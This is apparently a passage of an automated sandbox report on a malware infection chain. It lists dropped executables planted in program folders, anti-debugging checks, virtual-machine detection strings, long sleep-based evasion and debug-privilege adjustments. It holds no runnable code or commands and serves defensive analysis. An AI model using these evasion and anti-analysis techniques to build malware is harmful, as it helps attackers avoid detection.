                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
                    Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5700Thread sleep count: 3172 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99857s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99734s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99616s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99490s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99340s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5700Thread sleep count: 1615 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99213s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99059s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98933s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98745s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98601s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98340s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98058s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97658s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97450s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97290s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97130s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96991s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96848s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96685s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96574s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96464s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96337s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96217s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99868s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99648s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99373s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99092s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98943s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98757s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98620s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98497s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98343s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97811s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97476s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97332s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97188s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -97051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96915s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96807s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96694s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96585s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96475s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -96321s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199841s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199722s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1199597s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198821s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198614s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198392s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198228s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1198072s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197864s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197704s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197560s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197387s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197208s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1197052s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1196735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1196096s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195729s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195572s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195393s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195265s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1195137s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -1194990s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4832Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 5364Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 6756Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 4613 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2444Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif TID: 2168Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6616Thread sleep time: -90000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7D1537B4C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7D1537B4C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F138D440
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF7F13CD4A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF7F13CB3D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1403674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF7F1403674
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1421B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF7F1421B04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14219F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF7F14219F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF7F13CDBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF7F13C5E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF7F142234C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF7F13BC6F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1423100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F1423100
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F14210C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1426F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF7F1426F80
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02EA5908
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF7F140511C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99857
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99734
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99616
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99490
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99340
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99213
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99059
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98933
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98745
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98601
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98340
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98218
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98058
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97658
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97450
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97290
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97130
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96991
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96848
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96685
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96574
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96464
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96337
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96217
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99868
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99648
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99373
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99092
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98943
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98757
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98620
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98497
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97811
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97476
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97332
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97188
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97051
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96915
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96807
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96694
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96585
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96475
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96321
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199841
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199722
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199597
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198821
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198614
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198392
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198072
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197864
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197704
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197560
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197387
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197208
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197052
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196735
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196096
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195729
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195572
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195393
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195265
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195137
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1194990
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: Native_neworigin.exe, 00000020.00000002.1908517651.00000000008CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHZ?
                    Source: Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758689700.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2842577737.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2282224682.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2429430212.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2528462938.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2166690371.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2676022398.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547195951.000000000018A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2592856987.000000000018A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: AnyDesk.PIF, 0000000F.00000002.1668921503.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8[
                    Source: xpha.pif, 0000001E.00000002.1766619799.0000000002C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,15_2_02EBF744
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPort
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15363FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7D15363FC
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02EB894C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15293B0 SetUnhandledExceptionFilter,4_2_00007FF7D15293B0
